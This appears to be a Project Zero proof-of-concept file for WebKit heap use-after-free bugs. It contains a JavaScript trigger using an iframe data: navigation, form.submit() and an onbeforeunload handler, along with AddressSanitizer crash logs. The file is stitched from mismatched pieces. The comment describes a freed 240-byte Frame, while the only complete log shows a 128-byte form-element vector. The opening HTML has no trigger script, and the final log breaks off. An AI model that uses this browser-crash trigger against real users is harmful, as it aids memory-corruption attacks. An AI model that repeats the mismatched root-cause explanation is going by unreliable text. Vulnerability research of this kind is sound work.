<textarea id="textarea1">a</textarea>
<object id="object"></object>
<textarea id="textarea2">b</textarea>
<!--
=================================================================
ASan log:
=================================================================
==934==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b9810 at pc 0x000114b6f49c bp 0x7fff511323f0 sp 0x7fff511323e8
READ of size 8 at 0x60c0000b9810 thread T0
==934==WARNING: invalid path to external symbolizer!
==934==WARNING: Failed to use and restart external symbolizer!
#0 0x114b6f49b in WebCore::FormSubmission::create(WebCore::HTMLFormElement&, WebCore::FormSubmission::Attributes const&, WebCore::Event*, WebCore::LockHistory, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb3749b)
#1 0x114daba4b in WebCore::HTMLFormElement::submit(WebCore::Event*, bool, bool, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd73a4b)
#2 0x1157ef370 in WebCore::jsHTMLFormElementPrototypeFunctionSubmitBody(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17b7370)
#3 0x1157ec668 in long long WebCore::IDLOperation<WebCore::JSHTMLFormElement>::call<&(WebCore::jsHTMLFormElementPrototypeFunctionSubmitBody(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17b4668)
#4 0x354389601027 (<unknown module>)
#5 0x122546e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)
#6 0x122546e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)
#7 0x12253ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f)
#8 0x1221a3847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847)
#9 0x12212488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a)
#10 0x12173d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731)
#11 0x12173d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2)
#12 0x12173dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13)
#13 0x115276615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615)
#14 0x1156896cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd)
#15 0x1149f5010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010)
#16 0x1149f4ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0)
#17 0x1148d2051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051)
#18 0x1148e1c0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f)
#19 0x1147d4b0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f)
#20 0x1147cebad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad)
#21 0x114b813ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed)
#22 0x114b7e75c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c)
#23 0x1147ee523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523)
#24 0x114d725d0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a5d0)
#25 0x11488f693 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x857693)
#26 0x114850736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736)
#27 0x1142cc047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047)
#28 0x1142c4df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1)
#29 0x116d9c661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661)
#30 0x10f5fa43b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b)
#31 0x10f5fd6d9 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9)
#32 0x10f5fcbc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9)
#33 0x10edee117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117)
#34 0x10ebcd695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695)
#35 0x10ebd6a48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48)
#36 0x122bbe8e3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d228e3)
#37 0x122bbf1b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1)
#38 0x7fff8c5f6320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320)
#39 0x7fff8c5d721c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c)
#40 0x7fff8c5d6715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715)
#41 0x7fff8c5d6113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)
#42 0x7fff8bb36ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#43 0x7fff8bb36cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#44 0x7fff8bb36b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#45 0x7fff8a0cfa53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53)
#46 0x7fff8a84b7ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed)
#47 0x7fff8a0c43da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da)
#48 0x7fff8a08ee0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d)
#49 0x7fffa1faf8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#50 0x7fffa1fae2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#51 0x10eaca56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#52 0x7fffa1d56234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x60c0000b9810 is located 16 bytes inside of 128-byte region [0x60c0000b9800,0x60c0000b9880)
freed by thread T0 here:
#0 0x111d32294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x122c0e650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650)
#2 0x114db0a77 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd78a77)
#3 0x114dad5cf in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd755cf)
#4 0x114dad43f in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd7543f)
#5 0x114b20fd8 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xae8fd8)
#6 0x114b2196e in WebCore::FormAssociatedElement::resetFormOwner() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xae996e)
#7 0x114dcbe6d in WebCore::HTMLInputElement::finishedInsertingSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd93e6d)
#8 0x114404e08 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChange const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cce08)
#9 0x1144049a2 in WebCore::ContainerNode::updateTreeAfterInsertion(WebCore::Node&, WebCore::ContainerNode::ReplacedAllChildren) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cc9a2)
#10 0x1144042ba in WebCore::ContainerNode::appendChildWithoutPreInsertionValidityCheck(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cc2ba)
#11 0x1144072f8 in WebCore::ContainerNode::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cf2f8)
#12 0x1163be49d in WebCore::Node::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x238649d)
#13 0x115a321e6 in WebCore::jsNodePrototypeFunctionAppendChildBody(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19fa1e6)
#14 0x115a2c648 in long long WebCore::IDLOperation<WebCore::JSNode>::call<&(WebCore::jsNodePrototypeFunctionAppendChildBody(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19f4648)
#15 0x354389601027 (<unknown module>)
#16 0x122546dd7 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aadd7)
#17 0x122546e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)
#18 0x12253ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f)
#19 0x1221a3847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847)
#20 0x12212488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a)
#21 0x12173d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731)
#22 0x12173d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2)
#23 0x12173dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13)
#24 0x115276615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615)
#25 0x1156896cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd)
#26 0x1149f5010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010)
#27 0x1149f4ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0)
#28 0x1149bcb97 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984b97)
#29 0x1149bdbde in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985bde)
previously allocated by thread T0 here:
#0 0x111d31d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffa1ed8281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x122c0ead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4)
#3 0x122c0cd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d)
#4 0x122b93247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247)
#5 0x122b9263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a)
#6 0x114d97a90 in WTF::VectorBufferBase<WebCore::FormAssociatedElement*>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd5fa90)
#7 0x114d97df3 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::reserveCapacity(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd5fdf3)
#8 0x114db0a77 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd78a77)
#9 0x114dad5cf in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd755cf)
#10 0x114dad43f in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd7543f)
#11 0x114b20fd8 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xae8fd8)
#12 0x114b212d3 in WebCore::FormAssociatedElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xae92d3)
#13 0x114d9f8b0 in WebCore::HTMLFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd678b0)
#14 0x114e80f59 in WebCore::HTMLTextFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe48f59)
#15 0x114416e68 in WebCore::notifyNodeInsertedIntoDocument(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dee68)
#16 0x114416cad in WebCore::notifyChildNodeInserted(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3decad)
#17 0x114404d67 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChange const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3ccd67)
#18 0x114403396 in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cb396)
#19 0x114d4acdc in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd12cdc)
#20 0x114d43ea7 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0bea7)
#21 0x114d73c8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a)
#22 0x114d73849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849)
#23 0x114d729c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2)
#24 0x114d744e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8)
#25 0x114752531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531)
#26 0x11488f63d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d)
#27 0x114850736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736)
#28 0x1142cc047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047)
#29 0x1142c4df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb3749b) in WebCore::FormSubmission::create(WebCore::HTMLFormElement&, WebCore::FormSubmission::Attributes const&, WebCore::Event*, WebCore::LockHistory, WebCore::FormSubmissionTrigger)
Shadow bytes around the buggy address:
0x1c18000172b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c18000172c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c18000172d0: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
0x1c18000172e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c18000172f0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
=>0x1c1800017300: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800017310: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800017320: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x1c1800017330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1800017340: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800017350: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==934==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1353
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly. Per the ASan log below, the freed 240-byte object is a Frame allocated by Frame::create for the parser-inserted iframe; it is released by RefPtr&lt;Frame&gt;::operator=(nullptr) in ResourceLoader::releaseResources() during DocumentLoader::cancelMainResourceLoad(), and immediately afterwards read through DocumentLoader::frameLoader() from mainReceivedError() (WTF::UniqueRef&lt;FrameLoader&gt;::get() on the dangling Frame).
PoC:
=================================================================
-->
<script>
// Trigger sequence, run from <body onload>: rename the parser-inserted
// iframe, create a <form> that is never attached to the document and has no
// target, start a data: URL navigation in the iframe, submit the form, and
// then arm window.onbeforeunload so f() runs during the resulting unload.
// NOTE(review): the ASan "freed by" stack shows the Frame being dropped
// while the data: URL response is processed (loadDataURL -> ... ->
// cancelMainResourceLoad -> ResourceLoader::releaseResources); the exact
// statement order here is what sets that up — do not reorder when
// reproducing.
function go() {
    iframe.name = "foo";
    var form = document.createElement("form");
    iframe.src = "data:text/html,foo";
    form.submit();
    window.onbeforeunload = f;
}
// onbeforeunload handler: moves #del (which wraps the iframe in the markup
// below) into <head>. Presumably this detaches the iframe's Frame so that
// the loader's RefPtr<Frame> becomes the last reference and the Frame is
// freed in ResourceLoader::releaseResources(); DocumentLoader then reads it
// via frameLoader() in mainReceivedError() — see the ASan log. TODO confirm
// against the WebKit source for this revision.
function f() {
    document.head.appendChild(del);
}
</script>
<body onload=go()>
<del id="del">
<iframe id="iframe"></iframe>
<!--
=================================================================
ASan log:
=================================================================
==689==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110000889c8 at pc 0x000114c94a57 bp 0x7fff4fc33210 sp 0x7fff4fc33208
READ of size 8 at 0x6110000889c8 thread T0
==689==WARNING: invalid path to external symbolizer!
